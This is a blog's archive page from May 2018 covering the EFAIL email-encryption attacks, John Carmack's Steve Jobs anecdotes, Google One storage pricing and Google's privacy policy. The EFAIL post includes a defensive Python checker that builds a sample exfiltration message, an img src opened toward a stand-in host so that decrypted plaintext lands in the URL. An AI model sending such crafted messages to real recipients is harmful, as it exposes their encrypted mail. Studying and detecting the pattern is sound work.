Archive for May 14, 2018

Monday, May 14, 2018

EFail Vulnerabilities in OpenPGP and S/MIME

Efail (PDF, Hacker News, MacRumors, ArsTechnica):

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.


The victim’s client decrypts the encrypted second body part and stitches the three body parts together in one HTML email as shown below. Note that the src attribute of the image tag in line 1 is closed in line 4, so the URL spans over all four lines.

The email client then URL encodes all non-printable characters (e.g., %20 is a whitespace) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim’s email client sends the plaintext to the attacker.


Second, we describe the novel CBC/CFB gadget attacks which abuse vulnerabilities in the specification of OpenPGP and S/MIME to exfiltrate the plaintext.
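The direct-exfiltration message shape described above (an HTML part that opens an attribute quote, an encrypted part, and an HTML part that closes it) can be recognised before anything is decrypted. The following Python is an added example, not code from the EFAIL paper or from any mail client: it parses a multipart message and flags any text/html part with an unterminated quoted attribute that is followed by an S/MIME or PGP/MIME part. The two sample messages, the placeholder ciphertext and the host example.invalid are constructed for this example.

```python
# Added example (not code from the EFAIL paper or from any mail client): a
# defensive check for the direct-exfiltration message shape. The HTML part
# opens a quoted src attribute and never closes it; if a client stitches the
# decrypted part into the same HTML document, the plaintext lands inside the
# URL. Here we only inspect message structure, so no decryption is needed.
# The sample messages and the host example.invalid are constructed.
from email import message_from_string
from email.message import Message
from typing import List

# MIME types that carry S/MIME or PGP/MIME ciphertext.
ENCRYPTED_TYPES = {
    "application/pkcs7-mime",     # S/MIME enveloped data
    "multipart/encrypted",        # PGP/MIME envelope
    "application/pgp-encrypted",  # PGP/MIME control part
}


def has_unterminated_attribute(html: str) -> bool:
    """True if the HTML ends inside a tag while a quoted attribute is still open."""
    in_tag = False
    quote = None
    for ch in html:
        if not in_tag:
            if ch == "<":
                in_tag = True
        elif quote is not None:
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch == ">":
            in_tag = False
    return in_tag and quote is not None


def find_exfiltration_shape(msg: Message) -> List[str]:
    """One finding per HTML part that opens a quoted attribute and is followed,
    in the same multipart container, by an encrypted part."""
    findings: List[str] = []
    if not msg.is_multipart():
        return findings
    parts = msg.get_payload()
    for index, part in enumerate(parts):
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""
            html = raw.decode(part.get_content_charset() or "utf-8", "replace")
            later = [p.get_content_type() for p in parts[index + 1:]]
            if has_unterminated_attribute(html) and any(t in ENCRYPTED_TYPES for t in later):
                findings.append(
                    f"part {index} (text/html) opens a quoted attribute that a later "
                    f"part would close; following parts: {later}")
        elif part.is_multipart():
            findings.extend(find_exfiltration_shape(part))  # nested containers
    return findings


def check_message(raw: str) -> List[str]:
    """Parse a raw RFC 822 message and run the structural check on it."""
    return find_exfiltration_shape(message_from_string(raw))


def build_sample(first_html: str, last_html: str) -> str:
    """Constructed three-part message: HTML, S/MIME part (placeholder
    ciphertext, base64 of the word PLACEHOLDER), HTML."""
    return (
        "From: sender@example.invalid\n"
        "To: victim@example.invalid\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="BOUNDARY"\n\n'
        "--BOUNDARY\nContent-Type: text/html\n\n" + first_html + "\n"
        "--BOUNDARY\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n"
        "Content-Transfer-Encoding: base64\n\nUExBQ0VIT0xERVI=\n"
        "--BOUNDARY\nContent-Type: text/html\n\n" + last_html + "\n"
        "--BOUNDARY--\n"
    )


# The shape from the paper: the src attribute is opened before the encrypted
# part and closed after it, so a stitching client would put the plaintext in the URL.
EXFIL_SAMPLE = build_sample('<img src="http://example.invalid/', '">')
# Same three parts, but each HTML part is self-contained: nothing to flag.
BENIGN_SAMPLE = build_sample("<p>see attachment</p>", "<p>regards</p>")

if __name__ == "__main__":
    for name, sample in (("exfil", EXFIL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, check_message(sample) or "no finding")
```

The check is a heuristic on message structure, suited to a mail gateway or to a client that wants to refuse to stitch parts: it cannot see into the ciphertext, and it does not replace the two countermeasures the text implies, namely rendering a decrypted part in isolation rather than concatenating it with sibling HTML parts, and not loading remote content at all.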

Matthew Green:

PGP has supported proper optional message authentication (which stops this attack) since 2001, but it can’t be made mandatory because “some implementations haven’t kept up.”


So in summary, PGP clients are vulnerable because 17 years after a vulnerability was known, the mitigation was not made a default in GnuPG and defense was instead “left to PGP clients”, which also make a convenient scapegoat when it goes pear-shaped.


Moving on from the question of who is to blame, there are two neat findings in this work. The first is that most mail clients are (were) way too willing to reach out to remote servers, even when set up not to. This is: yikes.

Update (2018-05-14): See also: Bruce Schneier.

Update (2018-05-15): Howard Oakley:

It appears that macOS High Sierra 10.13.4 does address direct exfiltration of S/MIME email, with the following fix now reported in its security release notes[…]

Update (2018-05-18): See also: Matthew Green.

John Carmack’s Steve Jobs Stories

John Carmack (Hacker News, Reddit):

I was brought in to talk about the needs of games in general, but I made it my mission to get Apple to adopt OpenGL as their 3D graphics API.


Steve first talked about application development for iPhone at the same keynote I was demonstrating the new ID Tech 5 rendering engine on Mac, so I was in the front row. When he started going on about “Web Apps”, I was (reasonably quietly) going “Booo!!!”.

After the public cleared out and the rest of us were gathered in front of the stage, I started urgently going on about how web apps are terrible, and wouldn’t show the true potential of the device. We could do so much more with real native access!

Steve responded with a line he had used before: “Bad apps could bring down cell phone towers.” I hated that line. He could have just said “We aren’t ready”, and that would have been fine.


The Steve Jobs “hero / shithead” rollercoaster was real, and after riding high for a long time, I was now on the down side. Someone told me that Steve explicitly instructed them to not give me access to the early iPhone SDK when it finally was ready.

Previously: A Very Sweet Solution.

Update (2018-05-18): Jim Black (via John Carmack, Hacker News):

And what happened next was one of the most impressive things I’ve ever witnessed about Steve or any Silicon Valley exec. Early on in the discussion, the Apple engineer realized that “graphics engineer” in the room was John Carmack. And he realized that he was going to need to defend his technical decision, on the merits, in front of Steve. After extended back and forth, the Apple engineer said, “John, what you’re arguing for is the ideal …”

He never made it to the next word because Steve suddenly stood bolt upright, slamming both palms onto the desk and shouting, “NO!!!!”

“NO!!! What John is saying is NOT the ideal. What John is saying is what we have to do!!! Why are we doing this? Why are we going to all this trouble to build this ship when you’re putting a TORPEDO IN ITS HULL?!!!!”


As a comical aftermath to the story, John next told Steve point blank that the iMac mouse “sucked.” Steve sighed and explained that “iMac was for first-time computer buyers and every study showed that if you put more than one button on the mouse, the users ended up staring at the mouse.” John sat expressionless for 2 seconds, then moved on to another topic without comment.

Google Is Rebranding Storage Plans As “Google One”

Frederic Lardinois (Hacker News):

Google is revamping its consumer storage plans today by adding a new $2.99/month tier for 200 GB of storage and dropping the price of its 2 TB plan from $19.99/month to $9.99/month (and dropping the $9.99/month 1 TB plan). It’s also rebranding these storage plans (but not Google Drive itself) as “Google One.”

Going forward, you’ll also be able to share your storage quota with up to five family members.


That access to live experts — not some barely functional AI chatbot — comes with every Google One plan, including the $1.99/month 100 GB plan.


It’s worth stressing that the existing free quota of 15 GB will remain.


I think this article is missing the bigger picture—this isn’t about storage. This is Google trying to copy the success of Amazon Prime.

They’re going to try to unify lots of different benefits under a single, high-value subscription. The storage plans and priority support are just the first benefit they’ve tied to the subscription.

Previously: The Missing iCloud Storage Bump.

Update (2018-05-15): John Gruber:

So Google is now ahead on the free and $1/month tiers — but not by much — and is only matching Apple at the other tiers. I would think Google would want to kick Apple’s ass here.

Google’s Privacy Policy

Paris Martineau:

Though Google announced that it would stop using consumer Gmail content for ad personalization last July, the language permitting it to do so is still included in its current privacy policy, and it without a doubt still scans users emails for other purposes. Aaron Stein, a Google spokesperson, told NBC that Google also automatically extracts keyword data from users’ Gmail accounts, which is then fed into machine learning programs and other products within the Google family. Stein told NBC that Google also “may analyze [email] content to customize search results, better detect spam and malware,” a practice the company first announced back in 2012.

Via Nick Heer:

It’s bothersome that Google was scooping up users’ emails for ad targeting purposes in the first place, then said that they would stop doing it — after way too long — and has now given itself permission to keep doing so if they want to.

I don’t really understand the issue here. The headline seems misleading:

Remember when Google said it would stop reading your email?

Google only said that it would stop using your e-mail for advertising purposes, and no one is alleging that it didn’t follow through. The privacy policy that’s mentioned says:

When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier.

But this seems to apply to all of Google’s services, so of course it has to say that. Maybe there should be a separate privacy policy for Gmail?

Previously: Google Will Stop Reading Your E-mails for Gmail Ads.